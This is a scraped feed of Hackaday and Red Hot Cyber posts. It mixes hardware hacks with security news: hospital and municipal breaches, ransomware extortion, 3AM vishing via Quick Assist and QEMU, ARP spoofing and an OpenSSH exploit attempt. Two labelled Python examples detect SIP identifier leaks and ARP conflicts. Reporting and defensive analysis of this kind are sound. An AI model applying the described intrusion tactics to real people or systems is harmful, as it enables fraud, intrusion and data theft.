
TeensyROM NFC Game Loading on the C64


C64 on desk with NFC TeensyROM and game token

When retro computing nostalgia meets modern wireless wizardry, you get a near-magical tap-to-load experience. It’ll turn your Commodore 64 into a console-like system, complete with physical game cards. Inspired by TapTo for MiSTer, this latest hack brings NFC magic to real hardware using the TeensyROM. It’s been out there for a while, but it might not have caught your attention as of yet. Developed by [Sensorium] and showcased by YouTuber [StatMat], this project is a tactile, techie love letter to the past.

At the heart of it is the TeensyROM cartridge, which – thanks to some clever firmware modding – now supports reading NFC tags. These are writable NTag215 cards storing the path to game files on the Teensy’s SD card. Tap a tag to the NFC reader, and the TeensyROM boots your game. No need to fumble with LOAD “*”,8,1. That’s not only cool, it’s convenient – especially for retro demo setups.

What truly sets this apart is the reintroduction of physical tokens. Each game lives on its own custom-designed card, styled after PC Engine HuCards or printed with holographic vinyl. It’s a tangible, collectible gimmick that echoes the golden days of floppies and cartridges – but with 2020s tech underneath. Watch it here.

youtube.com/embed/FqgyiQdGp7o?…


hackaday.com/2025/05/23/teensy…


EMF Forming Was A Neat Aerospace Breakthrough


Typically, when we think about forming metal parts, we think about beating them with hammers, or squeezing them with big hydraulic presses. But what if magnets could do the squeezing? As it turns out—Grumman Aerospace discovered they can, several decades ago! Even better, they summed up this technique in a great educational video which we’ve placed below the break.

The video concerns the development of the Grumman EMF Torque Tube. The parts are essentially tubes with gear-like fittings mounted in either end, which are fixed with electromagnetic forming techniques instead of riveting or crimping. Right away, we’re told the key benefits—torque tubes built this way are “stronger, lighter, and more fatigue resistant” than those built with conventional techniques. Grumman used these torque tubes in such famous aircraft as the F-14 Tomcat, highlighting their performance and reliability.

Before……and after. The part is formed and the coil is destroyed.
The video goes on to explain the basics of the EMF torque tube production process. A tube is placed inside a coil, with the end fitting then installed inside. A capacitor bank dumps current through the coil to generate a strong electromagnetic field. This field is opposed by a secondary field generated by eddy currents. The two forces result in an explosive force which drives the tube inwards, gripping into the grooves of the end fitting, and destroys the coil in the process. Grumman notes that it specifically optimized a grooving profile for bonding tubes with end fittings, which maximised the strength of these EMF-produced joints.

This tip was sent in by [irox]. The video itself was posted by [Greg Benoit], who notes his father Robert Benoit was intimately involved with the development of the technique. Indeed, it was useful enough that the technology was licensed to Boeing, generating many millions of dollars for Grumman.

We feature all kinds of machining and forming techniques here, but this sort of forming isn’t something we see a lot of around these parts. Still, we’re sure someone will be Kickstarting a home EMF forming machine before the end of next week.

youtube.com/embed/QHxtY6_zxZo?…


hackaday.com/2025/05/23/emf-fo…


2025 Pet Hacks Contest: Aquassist Fish Feeder


Aquassist fish feeder

This project submitted to the 2025 Pet Hacks Contest brings a bit of IoT to your finned friends. Aquassist is a fish feeder that is primarily 3D printed, requiring only a servo and a microcontroller to give you remote control of feeding your fish.

The Aquassist consists of just six 3D-printed parts. At its core is an Archimedes screw, a mechanism that ensures consistent portions of fish food are dispensed into the fish tank. A small hopper on top holds the food, and to minimize the part count, all 3D-printed components are designed to be glued together.

The brains of the operation live in a Wemos D1 mini, a compact ESP8266 board programmed using the Arduino IDE. The feeding mechanism relies on an SG90 continuous rotation servo, which rotates the Archimedes screw to dispense food. Unlike standard servos, this model offers ample torque in a small package and can rotate continuously without hitting an angular limit.

The Aquassist is controlled via a web-based application accessible from any device. The D1 Mini connects to Firebase to check the feeding schedule or detect if the “Feed Now” button has been pressed. Users can set feeding times or trigger an immediate feeding through the app’s intuitive interface. Check out a video below to see the Aquassist in action, and check out our other entries into the 2025 Pet Hacks Contest.

youtube.com/embed/i-F6hm34lFM?…

2025 Hackaday Pet Hacks Contest


hackaday.com/2025/05/23/2025-p…


Tearing Down And Hacking The T2S+ Thermal Camera


[Dmytro] was able to lay his hands on an InfiRay T2S+ camera. It’s a capable thermal imaging unit that comes at a cheaper price than many of its rivals. [Dmytro] decided to pull it apart to see what makes it tick, and he discovered a few interesting things along the way.

Like so much modern hardware, pulling the case apart does require some spudging and levering. Once inside, though, it comes apart in a relatively straightforward manner. [Dmytro] notes some similarities between this camera and the Flir Lepton, another affordable thermal camera on the market. He also finds a clone of the Cypress FX2LP chip, which is used for talking USB. There’s also a Gowin FPGA inside, with [Dmytro] suspecting the gateware onboard could be modified. If so, the camera may be a candidate for running open source firmware in future.

What bothered [Dmytro] about this camera, though, was the software. When used with an Android phone, the camera demands the use of a proprietary app with questionable permissions. It can be used on a regular computer, where it appears as a standard webcam. However, in this mode, the camera fails to self-calibrate, and the images quickly become useless. [Dmytro] worked to hack around this by figuring out a way to trigger calibrations and run the proper image corrections manually when using the camera without the smartphone app. He also explores techniques to improve the resolution of the thermal measurements made by the camera.

We’ve seen some other neat thermal camera hacks over the years. Video after the break.

youtube.com/embed/bePf-qhZ_Vg?…

[Thanks to Clint for the tip!]


hackaday.com/2025/05/23/tearin…


2025 Pet Hacks Contest: Keep Your Hound Toasty Warm With This Heated Dog Bed


It’s been a universal trait among the different faithful Hackaday Hounds who have loped around these parts over the decades, that there is no place warm enough for their tastes. Fire up the stove and the dog is there stretched out in front of it, leaving one to wonder whether our house temperature is being cruel to the mutt, or simply that they are heat sponges with infinite capacity. There’s got to be some joy in doggy circles then at the prospect of [John.r.sheahan]’s heated dog bed, designed in particular with the comfort of an older dog in mind.

In electronics terms it’s a relatively low-tech project, using as it does a 12 volt electric lap blanket aimed at motorists. It’s nonetheless a hack, because it has a frame made of PVC pipe to hold it, with the blanket clipped in place. This forms a box-like structure above the sleeping position, keeping the dog very comfortable indeed over chilly nights. We’ve cared for more than one geriatric dog over the years, and can see that something like this is vital for their comfort and well-being.

This project is part of the 2025 Pet Hacks contest, so look out for more like it. Alternatively if your faithful friend uses something you made, why not enter yourself!

2025 Hackaday Pet Hacks Contest


hackaday.com/2025/05/23/2025-p…


Hackaday Podcast Ep 322: Fake Hackaday Writers, New Retro Computers, and a Web Rant


We’re back in Europe for this week’s Hackaday podcast, as Elliot Williams is joined by Jenny List. In the news this week is the passing of Ed Smylie, the engineer who devised the famous improvised carbon dioxide filter that saved the Apollo 13 astronauts with duct tape.

Closer to home is the announcement of the call for participation for this year’s Hackaday Supercon; we know you will have some ideas and projects you’d like to share.

Interesting hacks this week include a new Mac Plus motherboard and Doom (just) running on an Atari ST, while a LoRa secure messenger and an astounding open-source Ethernet switch captivated us on the hardware front. We also take a dive into the Mouse programming language, a minimalist stack-based environment from the 1970s. Among the quick hacks are a semiconductor dopant you can safely make at home, and a beautiful Mac Mini based cyberdeck.

Finally, we wrap up with our colleague [Maya Posch] making the case for a graceful degradation of web standards, something which is now sadly missing from so much of the online world, and then with the discovery that ChatGPT can make a passable show of emulating a Hackaday scribe. Don’t worry folks, we’re still reassuringly meat-based.

html5-player.libsyn.com/embed/…

Insert MP3 podcast link here.

Episode 322 Show Notes:

News:


What’s That Sound:


Interesting Hacks of the Week:



Quick Hacks:



Can’t-Miss Articles:



hackaday.com/2025/05/23/hackad…


POV On The Flipper Zero


The Flipper Zero can do all kinds of neat stuff, like helping you cut keys or decode various radio transmissions. However, until now, it hasn’t been particularly adept at persistence of vision tasks. For that very purpose, [Derek] built the LightMessenger.
The device doing its job.
The LightMessenger is a hardware add-on module for the Flipper Zero. In persistence-of-vision mode, you can plug it in via the GPIO header and display messages in the air by shaking it around. Even better, you can do so in color, with a height resolution of 16 pixels—meaning you can display some nice text or basic graphics. You can key in different text or select and edit bitmaps using the utility on the Flipper screen itself.

[Derek] also included a flashlight mode for the simple utility of it all. In Part 2 of [Derek’s] write-up, he also goes into detail on the development and manufacturing process for the device.

Files are on GitHub for the curious. We’ve gone over the basics of POV projects before, too.

youtube.com/embed/NlNuNxXg9r0?…


hackaday.com/2025/05/23/pov-on…


An Italian Hospital Has Been Breached! Videos of Patients and Operating Rooms Are Online!


“Hello Italy! The attack on the Italian hospital succeeded. We settled into the system, uploading an exploit to the server and obtaining a lot of useful information from patient records. In the image you can see the doctors operating on their patients. 😄 Will the journalists accuse us of cyberterrorism again?”

This is the message, cynical and disturbing, published by the hacktivists of the SECTOR16 group after breaching the systems of an Italian hospital. They took control of the video surveillance system. They recorded and then publicly released footage of the operating rooms. They stole sensitive patient data. They demonstrated, once again, how exposed, vulnerable and defenceless our healthcare facilities are.

But what if the attack had been destructive?


This is not a simulation. It is not a test. It is an extremely serious event!

If the attack had been destructive, as is often the case with ransomware, the hospital's systems could have gone into total lockdown: wards paralysed, clinical records inaccessible, operations suspended, emergency care delayed. When it comes to hospitals, every second can make the difference between life and death.

And yet, today, we let cybercriminals break into our hospitals as easily as they break into a poorly protected website.

Are they cybercriminals? Yes. But we are incompetent at managing the cybersecurity of critical infrastructure.

Because resources, skills, operational capacity and attention are lacking. Because there is still no culture of digital security in the healthcare sector. And this is unacceptable. Healthcare data is the new gold of the dark web: complete, detailed, highly sensitive. But it is not only privacy that is at risk. It is the patients. It is the doctors. It is public healthcare as a whole.

We must act. Now


Real investment in cybersecurity for hospitals is needed. Staff must be trained. Adequate defence systems must be acquired. Because protecting healthcare facilities today does not just mean avoiding a breach: it means saving human lives.

And while groups like SECTOR16 joke about images stolen from an operating room, we should stop downplaying it. We should stop pretending that “these things only happen elsewhere”.

They happen here! And when it is you going to the hospital and they cannot give you the care you need because they are drastically understaffed due to a cyberattack, you will remember this article.

It is time to treat cybersecurity as a public health issue. Because it is one.

And you know what? Here is the list of known attacks on Italian hospitals. Because we at Red Hot Cyber do not forget.

Known attacks on Italian hospitals


Long ago we reported that hospitals would become “the geese that lay the golden eggs” for cybercrime, since the risk involves not only the loss of data but also people's lives. Criminals know well that a hospital's speed of action is essential, but we also know that hospitals have a “cyber posture” that needs deep revision.

Unfortunately many hospital organisations have been hit by security incidents, and ransomware in particular is the most commonly used attack vector. The list of affected healthcare organisations, where the claims against the public administration are known to us, grows longer day after day:

Unfortunately Italy seems not to have yet understood the strategic importance of these infrastructures at the national security level. These infrastructures are continuously targeted by cybercrime and must be protected to guarantee people's health.

The article An Italian Hospital Has Been Breached! Videos of Patients and Operating Rooms Are Online! comes from il blog della sicurezza informatica.


Coca-Cola United Arab Emirates under attack: Everest Ransomware strikes via infostealer


On 22 May 2025, news emerged of a ransomware attack against the United Arab Emirates division of the Coca-Cola Company, claimed by the Everest group. The compromise is said to have followed the use of an infostealer, an increasingly widespread tool in the cybercrime landscape, capable of silently stealing corporate credentials and facilitating unauthorised access.

The attack was made public through the onion portal run by the Everest group, where evidence of the intrusion was published together with the announced intention to publicly release the stolen data within a few days. In parallel, part of the exfiltrated database already appears to be for sale on the dark web, as indicated by relevant threads on underground forums.

At present, neither the precise volume of exfiltrated data nor the operational impact on the company's activities in the region has been confirmed. However, the publication of the attack on criminal channels most likely indicates the group's intention to move to the extortion or data-sale phase, a strategy Everest has adopted in the past.

Disclaimer: This report includes screenshots and/or text taken from publicly accessible sources. The information provided is solely for threat intelligence and cybersecurity risk awareness purposes. Red Hot Cyber condemns any unauthorised access, improper dissemination or illicit use of such data. At present, it is not possible to independently verify the authenticity of the reported information, as the organisation involved has not yet issued an official statement on its website. Consequently, this article should be considered for informational and intelligence purposes only.

The stolen data


According to what Everest published on its Tor portal, the compromised data includes sensitive information on approximately 959 employees, including:

  • Identity documents
  • Salesforce profiles
  • Complete personal records
  • Internal and confidential information

Screenshots show personal data, official documents and internal user profiles, indicating a potentially severe impact on employee privacy and on the organisation's operational security.

In addition, another portion of the data appears for sale on underground forums, as shown in the image below, confirming that exfiltration took place and that the actors involved are attempting to monetise it.


As is Everest's practice, a visible timer has been activated on the dark web portal associated with the attack. This countdown represents the deadline by which the victim organisation is expected to negotiate or pay a ransom. When the time runs out, the data will presumably be made public or sold outright to third parties.

This pressure mechanism is an integral part of the triple extortion tactic, which combines encryption, reputational threat and, in some cases, even direct contact with the affected company's customers or partners.

Who is Everest? An actor between ransomware and extortion


Everest is a ransomware-as-a-service (RaaS) group active since 2020, known for targeted attacks on large enterprises and critical infrastructure. Their modus operandi often relies on collaboration with access brokers, criminals who supply compromised corporate credentials obtained through infostealers, phishing or known vulnerabilities.

Once inside the network, Everest performs lateral movement, exfiltrates sensitive data and finally begins encrypting systems. Victims are then blackmailed with the threat of publicly disclosing the stolen data, a strategy known as double extortion.

Conclusions


The Coca-Cola UAE case is a concrete example of the modern attack chain: from infostealer infection to infiltration of the corporate network, through to the ransomware attack and the sale of the data on the dark web.

RHC will continue to monitor the situation and will publish any further updates should significant information emerge.
We invite anyone aware of relevant details to contact us through the whistleblower's encrypted email, with the option of remaining anonymous.

The article Coca-Cola United Arab Emirates under attack: Everest Ransomware strikes via infostealer comes from il blog della sicurezza informatica.


This Week in Security: Signal DRM, Modern Phone Phreaking, and the Impossible SSH RCE


Digital Rights Management (DRM) has been the bane of users since it was first introduced. Who remembers the battle it was getting Netflix running on Linux machines, or the literal legal fight over the DVD DRM decryption key? So the news from Signal, that DRM is finally being put to use to protect users, is ironic.

The reason for this is Microsoft Recall — the AI powered feature that takes a snapshot of everything on the user’s desktop every few seconds. For whatever reason, you might want to exempt some windows from Recall’s memory window. It doesn’t speak well for Microsoft’s implementation that the easiest way for an application to opt out of the feature is to mark its window as containing DRM content. Signal, the private communications platform, is using this to hide from Recall and other screenshotting applications.

The Signal blog warns that this may be just the start of agentic AI being rolled out with insufficient controls and permissions. The issue here isn’t the singularity or AI reaching sentience, it’s the same old security and privacy problems we’ve always had: too much information being collected, data being shared without permission, and an untrusted actor having access to way more than it should.

Legacy Malware?


The last few stories we’ve covered about malicious code in open source repositories have featured how quickly the bad packages were caught. Then there’s this story about two-year-old malicious packages on NPM that are just now being found.

It may be that the reason these packages weren’t discovered until now, is that these packages aren’t looking to exfiltrate data, or steal bitcoin, or load other malware. Instead, these packages have a trigger date, and just sabotage the systems they’re installed on — sometimes in rather subtle ways. If a web application you were writing was experiencing intermittent failures, how long would it take you to suspect malware in one of your JavaScript libraries?

Where Are You Calling From?


Phone phreaking isn’t dead, it has just gone digital. One of the possibly apocryphal origins of phone phreaking was a toy bo’sun whistle in boxes of cereal, that just happened to play a 2600 Hz tone. More serious phreakers used more sophisticated, digital versions of the whistle, calling them blue boxes. In modern times, apparently, the equivalent of the blue box is a rooted Android phone. [Daniel Williams] has the story of playing with Voice over LTE (VoLTE) cell phone calls. A bug in the app he was using forced him to look at the raw network messages coming from O2 UK, his local carrier.

And those messages were weird. VoLTE is essentially using the Session Initiation Protocol (SIP) to handle cell phone calls as Voice over IP (VoIP) calls using the cellular data network. SIP is used in telephony all over the place, from desk phones to video conferencing solutions. SIP calls have headers that work to route the call, which can contain all sorts of metadata about the call. [Daniel] took a look at the SIP headers on a VoLTE call, and noticed some strange things. For one, the International Mobile Subscriber Identity (IMSI) and International Mobile Equipment Identity (IMEI) codes for both the sender and destination were available.

He also stumbled onto an interesting header, the Cellular-Network-Info header. This header encodes way too much data about the network the remote caller is connected to, including the exact tower being used. In an urban environment, that locates a cell phone to an area not much bigger than a city block. Together with leaking the IMSI and IMEI, this is a dangerous amount of information to leak to anyone on the network. [Daniel] attempted to report the issue to O2 in late March, and was met with complete silence. However, a mere two days after this write-up was published, on May 19th, O2 finally made contact, and confirmed that the issue had finally been resolved.
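To make the leak described above concrete from the defender's side, here is an added Python example (not code from [Daniel]'s write-up or from O2) that parses a SIP INVITE, flags headers carrying network-location or device-identifier data, and produces a redacted copy suitable for logging. The INVITE, its phone numbers and its IMEI/cell values are constructed placeholders; the `Cellular-Network-Info` header name comes from the article, `P-Access-Network-Info` is the standard 3GPP header for cell identity, and the `urn:gsma:imei` form is how IMS clients normally carry the IMEI in a Contact `+sip.instance` parameter. The `imsi=` pattern is an assumed generic form for this example.

```python
import re

# Header names that describe where the remote party's handset is attached.
# Cellular-Network-Info is the header named in the write-up; P-Access-Network-Info
# is the standard 3GPP header (RFC 7315) that carries the serving cell identity.
LOCATION_HEADERS = {"cellular-network-info", "p-access-network-info"}

# Identifier forms that can appear inside otherwise harmless header values.
# urn:gsma:imei is the real IMS encoding of the IMEI; the imsi pattern is an assumption.
IDENTIFIER_PATTERNS = [
    ("IMEI", re.compile(r"urn:gsma:imei:[0-9-]+", re.I)),
    ("IMSI", re.compile(r"\bimsi[=:]\s*[0-9]{6,15}", re.I)),
]

# Constructed sample INVITE. Numbers are from the UK reserved fictional range,
# the IMEI and cell id are all-zero placeholders.
SAMPLE_INVITE = "\r\n".join([
    "INVITE sip:+447700900002@ims.example.net SIP/2.0",
    "Via: SIP/2.0/TCP 10.0.0.5:5060;branch=z9hG4bK-constructed",
    "From: <sip:+447700900001@ims.example.net>;tag=1",
    "To: <sip:+447700900002@ims.example.net>",
    'Contact: <sip:10.0.0.5:5060>;+sip.instance="<urn:gsma:imei:00000000-000000-0>"',
    "P-Access-Network-Info: 3GPP-E-UTRAN-FDD;utran-cell-id-3gpp=0000000000000000",
    "Cellular-Network-Info: constructed-placeholder-value",
    "Content-Length: 0",
]) + "\r\n\r\n"


def parse_sip(raw):
    """Split a SIP message into (start line, [(name, value)], body).

    Headers are split on the first colon only; no line folding support,
    which is enough for the flat messages this example inspects.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def find_leaks(raw):
    """Return [(header name, reason)] for each header that exposes location or identity."""
    findings = []
    _, headers, _ = parse_sip(raw)
    for name, value in headers:
        if name.lower() in LOCATION_HEADERS:
            findings.append((name, "network location header"))
            continue
        for label, pattern in IDENTIFIER_PATTERNS:
            if pattern.search(value):
                findings.append((name, f"{label} identifier in value"))
                break
    return findings


def redact(raw):
    """Return a copy safe to log: location headers blanked, identifiers masked in place."""
    start, headers, body = parse_sip(raw)
    out = [start]
    for name, value in headers:
        if name.lower() in LOCATION_HEADERS:
            value = "[REDACTED]"
        else:
            for _, pattern in IDENTIFIER_PATTERNS:
                value = pattern.sub("[REDACTED]", value)
        out.append(f"{name}: {value}")
    return "\r\n".join(out) + "\r\n\r\n" + body


if __name__ == "__main__":
    for name, reason in find_leaks(SAMPLE_INVITE):
        print(f"{name}: {reason}")
    print(redact(SAMPLE_INVITE))
```

The redaction keeps routing-relevant headers intact (the Contact URI survives, only the IMEI URN inside it is masked), so the same function can sit in front of a signalling logger without breaking call troubleshooting.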

ARP Spoofing in Practice


TCP has an inherent security advantage: because it’s a stateful connection, it’s much harder to make a connection from a spoofed IP address. Harder, but not impossible. One of the approaches that allows actual TCP connections from spoofed IPs is Address Resolution Protocol (ARP) poisoning. Ethernet switches don’t look at IP addresses, but instead forward frames using MAC addresses. ARP is the protocol that distributes the MAC-address-to-IP mapping on the local network.

And like many protocols from early in the Internet’s history, ARP requests don’t include any cryptography and aren’t validated. Generally, whoever claims an IP address first wins, so the key is automating this process. And hence, enter NetImposter, a new tool specifically designed to automate this process, sending spoofed ARP packets, and establishing an “impossible” TCP connection.
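Because ARP replies are unauthenticated, the practical defence is to watch for the moment a second MAC address starts answering for an IP that already had a binding. The following Python script is an added example (not code from the article or from NetImposter): it builds an IP-to-MAC table from a stream of observed ARP replies and reports every reply that contradicts an earlier binding, optionally seeded with a static table of trusted hosts such as the gateway. The reply records are constructed sample data; the `trusted` parameter is an assumption of this example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    """One observed ARP reply: who claims which IP, and when."""
    ts: float         # seconds since start of capture
    sender_ip: str
    sender_mac: str


# Constructed capture: 10.0.0.1 (the gateway) answers from aa:...:01, then a
# second station starts answering for the same IP from de:ad:be:ef:00:99,
# which is exactly what the poisoning described in the article looks like.
SAMPLE_REPLIES = [
    ArpReply(0.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    ArpReply(1.0, "10.0.0.20", "aa:aa:aa:aa:aa:20"),
    ArpReply(5.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    ArpReply(9.0, "10.0.0.1", "de:ad:be:ef:00:99"),
    ArpReply(9.5, "10.0.0.1", "DE:AD:BE:EF:00:99"),
    ArpReply(12.0, "10.0.0.20", "aa:aa:aa:aa:aa:20"),
]


def detect_arp_conflicts(replies, trusted=None):
    """Return [(ts, ip, known_mac, claimed_mac)] for each reply whose sender MAC
    differs from the MAC already bound to that IP.

    `trusted` is an optional static {ip: mac} table (assumed here, e.g. the
    gateway's real address). Bindings are learned from the first reply seen for
    an IP and are never overwritten, so a station that keeps re-asserting a bad
    mapping is reported on every reply rather than silently winning.
    """
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        known = table.get(r.sender_ip)
        if known is None:
            table[r.sender_ip] = mac
        elif known != mac:
            alerts.append((r.ts, r.sender_ip, known, mac))
    return alerts


if __name__ == "__main__":
    for ts, ip, known, claimed in detect_arp_conflicts(SAMPLE_REPLIES):
        print(f"t={ts:5.1f}s  {ip} already bound to {known}, now claimed by {claimed}")
```

Seeding `trusted` matters for the "whoever claims first wins" case the article mentions: if the monitor starts after the attacker has already poisoned the segment, the static entry for the gateway is what turns the attacker's first reply into an alert instead of a learned binding.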

Impossible RCE in SSH


Over two years ago, researchers at Qualys discovered a pre-authentication double-free in OpenSSH server version 9.1. 9.2 was quickly released, and because none of the very major distributions had shipped 9.1 yet, what could have been a very nasty problem was patched pretty quietly. Because of the now-standard hardening features in modern Linux and BSD distributions, this vulnerability was thought to be impossible to actually leverage into Remote Code Execution (RCE).

If someone gets a working OpenSSH exploit from this bug, I'm switching my main desktop to Windows 98 😂 (this bug was discovered by a Windows 98 user who noticed sshd was crashing when trying to login to a Linux server!)

— Tavis Ormandy (@taviso) February 14, 2023

The bug was famously discovered by attempting to SSH into a modern Linux machine from a Windows 98 machine, and Tavis Ormandy claimed he would switch to Windows 98 on his main machine if someone actually managed to exploit it for RCE. [Perri Adams] thought this was a hilarious challenge and started working on an exploit. Now we have good and bad news about this effort. [Perri] is pretty sure it is actually possible to groom the heap and, with enough attempts, overwrite an interesting pointer, leaking enough information in the process to overcome address randomization and get RCE. The bad news is that the reward of dooming [Tavis] to a Windows 98 machine for a while wasn’t quite enough to be worth the pain of turning the work into a fully functional exploit.

But that’s where [Perri’s] OffensiveCon keynote took an AI turn. How well would any of the cutting-edge AIs do at finding, understanding, fixing, and exploiting this vulnerability? As you probably already guessed, the results were mixed. Two of the three AIs thought the function just didn’t have any memory management problems at all. Once informed of the problem, the models had more useful analysis of the code, but they still couldn’t produce any remotely useful code for exploitation. [Perri’s] takeaway is that AI systems are approaching the threshold of being useful for defensive programming work. Distilling what code is doing, helping in reverse engineering, and working as a smarter sort of spell checker are all wins for programmers and security researchers. But fortunately, we’re not anywhere close to a world where AI is developing and deploying exploitations.

youtube.com/embed/Y1naY3gupRw?…

Bits and Bytes


A pair of reverse engineering/forensic tools have had new versions released very recently. Up first is Frida, a runtime debugger on steroids, which is celebrating its 17th major version release. One of the major features is migrating to pluggable runtime bridges, and moving away from strictly bundling them. We also have Volatility 3, a memory forensics framework. This isn’t the first Volatility 3 release, but it is the release where version three officially has parity with version two of the framework.

The Foscam X5 security camera has a pair of buffer overflows, each of which can be leveraged to achieve arbitrary RCE. One of the proof-of-concepts has a very impressive use of a write-null-anywhere primitive to corrupt a return pointer and jump into a ROP gadget. The concerning element of this disclosure is that the vendor has been completely unresponsive, and the vulnerabilities are still unaddressed.

And finally, one of the themes that I’ve repeatedly revisited is that airtight attribution is really difficult. [Andy Gill] walks us through just one of the many reasons that’s difficult. Git cryptographically signs the contents of a commit, but not the timestamps. This came up when looking through the timestamps from “Jia Tan” in the XZ compromise. Git timestamps can be trivially rewritten. Attestation is hard.


hackaday.com/2025/05/23/this-w…


Nightmare vishing: 24 emails in 3 minutes and one phone call to hack an entire company


The operators of the 3AM ransomware carry out targeted attacks against designated targets. The hackers bombard company employees with emails and phone calls, posing as support staff, to pressure users into handing over credentials for remote access to corporate systems.

Sophos experts write that in the past such tactics were used mainly by the Black Basta ransomware operators and the FIN7 hacker group, but the effectiveness of these attacks has now led to their wider adoption.

Researchers report that between November 2024 and January 2025 at least 55 attacks using these techniques were detected, and they link the activity to two different threat clusters.

The attacks include sending multiple emails, vishing (voice phishing) via Microsoft Teams and abuse of Quick Assist. Apparently, the leak of Black Basta's internal chats in early 2025 proved useful to other attackers. They are now using a template for phishing attacks via Microsoft Teams, posing as IT staff.

One of the 3AM ransomware attacks on a Sophos customer took place in the first quarter of 2025, lasted nine days, and the hackers used a similar approach. Only instead of using Microsoft Teams, they started with phone phishing.

The attackers spoofed the real phone number of the customer's IT department to make the call more credible. The hackers called while simultaneously sending numerous malicious emails: in just three minutes, the victim received 24 of them.

In this way, the attacker convinced an employee of the targeted company to open Microsoft Quick Assist and grant remote access, supposedly to protect against malicious activity. The hacker then downloaded and unpacked a malicious archive containing a VBS script, a QEMU emulator and a Windows 7 image with the QDoor backdoor.

QEMU was used to evade detection by routing network traffic through virtual machines created on the platform, allowing the hackers to gain persistent but undetected access to the victim's network. Finally, the attackers performed reconnaissance on the targeted company's network using WMIC and PowerShell, created a local administrator account for connecting via RDP, installed the commercial RMM tool XEOXRemote and compromised the domain administrator account.

The article Nightmare vishing: 24 emails in 3 minutes and one phone call to hack an entire company comes from il blog della sicurezza informatica.


Behold Self-Synchronizing, Air-Flopping Limbs That Hop and Swim


Dutch research institute [AMOLF] shows off a small robot capable of walking, hopping, and swimming without any separate control system. The limbs synchronize thanks to the physical interplay between the robot’s design and its environment. There are some great videos on that project page, so be sure to check it out.
A kinked soft tube oscillates when supplied with continuous air.
Powered by a continuous stream of air blown into soft, kinked tubular limbs, the legs oscillate much like the eye-catching “tube man” many of us have seen by roadsides. At first it’s chaotic, but the movements rapidly synchronize into a meaningful rhythm that self-synchronizes and adapts. On land, the robot does a sort of hopping gait. In water, it becomes a paddling motion. The result in both cases is a fast little robot that does it all without any actual control system, relying on physics.

You can watch it in action in the video, embedded below. The full article “Physical synchronization of soft self-oscillating limbs for fast and autonomous locomotion” is also available.

Gait control is typically a nontrivial problem in robotics, but it doesn’t necessarily require a separate control system. Things like BEAM robotics and even the humble bristlebot demonstrate the ability for relatively complex behavior and locomotion to result from nothing more than the careful arrangement of otherwise simple elements.

youtube.com/embed/oyKnCRqNj84?…


hackaday.com/2025/05/23/behold…


“Italy, Shame on You! Mafia Country!”: Nova's Insults Against Italy After the Attack on the Municipality of Pisa


The NOVA black-hat hackers strike again, this time with insults directed at Italy after publishing data from the alleged cyberattack on the Municipality of Pisa. After claiming the attack on 10 May 2025, the criminal group published the first stolen data exactly 11 days after the announcement on their underground forum.

Disclaimer: This report includes screenshots and/or text taken from publicly accessible sources. The information provided is intended exclusively for threat intelligence and cybersecurity risk awareness purposes. Red Hot Cyber condemns any unauthorised access, improper dissemination or illicit use of such data. At present, the authenticity of the reported information cannot be independently verified, since the organisation involved has not yet released an official statement on its website. Consequently, this article should be considered purely for informational and intelligence purposes.
Image from the home page of Nova's underground site on the onion network
According to what emerged from NOVA's underground site, the gang has made available a 100 GB archive, split into several compressed files titled “Municipality of Pisa”.

The content is said to have been encrypted on 10 May, the same day as the initial claim.
Image of the post published by Nova on its own site

No payment, data published


The message published by the gang contains heavy insults against the Italian authorities, accused of having refused to negotiate or to pay the 2 million dollar “bug bounty” demanded as ransom. The tone of the message is aggressive and sexist, with denigrating phrases and threats of a “Part 2”, which hints at further publications.
Italy, shame on you

Mafia country, now it's the country of clowns, they have no intention of paying even a little (2 million dollars) as bounty, but what do you think of a country under the control of women, [*** we omit the translation out of respect ****] , nobody sent us a message to start the ransom, we sent messages to PISA's gmail but nah, POOR COUNTRY SCREW YOU, PART 2 IS COMING, this was just the beginning, go ask ACN for help, have fun with the data
The message also points to a failed attempt at contact by the group, which claims to have tried to send messages via Gmail to the Municipality of Pisa without receiving any reply.

ACN alerted, attack confirmed


Now, with the actual publication of the data, the event could qualify as a data breach, with potential repercussions on citizens' privacy and on the administration's digital infrastructure, although all of this remains to be verified.

The specific content of the “d1.7z” and “U.7z” archives is not yet clear, but given the size and the institutional target, there are fears that they contain personal data, emails, contracts, administrative documents and other sensitive information.

Conclusions


The attack on the Municipality of Pisa is yet another case in which cybercriminals do not limit themselves to encrypting data, but seek to publicly humiliate institutions, using vulgar, misogynistic and intimidating language. Does this tactic serve to increase psychological pressure and push towards paying the ransom? Probably not, but it represents a turning point we have already seen before with the theme of the IT “chimpanzees”.

Nonetheless, the right course of action remains not to pay ransoms: giving in to blackmail feeds a vicious circle that further funds cybercrime, strengthening groups like NOVA.

However, it is equally essential to invest decisively in cybersecurity, at both local and national level. The Pisa case shows that there is no more time to delay: it is urgent to make our country more resilient, responsive and prepared to face increasingly sophisticated and ruthless threats.

And this is an “operational” issue, no longer a “political” one.

As is our custom, we always leave room for a statement from the organisation should it wish to give us updates on this matter, and we will be glad to publish it in a dedicated article highlighting the issue.

RHC will monitor how the matter develops in order to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.

The article “Italy, Shame on You! Mafia Country!”: Nova's Insults Against Italy After the Attack on the Municipality of Pisa comes from the cybersecurity blog.


Foil Leyden Jar Helps Bring Crookes Tube to Life


Crookes Tube

It might be too soon to consider the innards of the old CRT monitor at the back of your closet to be something worth putting on display in your home or workshop. For that curio cabinet-worthy appeal, you need to look a bit further back. Say, about 150 years. Yes, that’ll do. A Crookes tube, the original electron beam-forming vacuum tube of glass, invented by Sir William Crookes et al. in the late 19th century, is what you need.

And a Crookes tube is what [Markus Bindhammer] found on AliExpress one day. He felt that piece of historic lab equipment was asking to be put on display in proper fashion. So he set to work crafting a wooden stand for it out of a repurposed candlestick, a nice piece of scrap oak, and some brass feet giving it that antique mad-scientist feel.

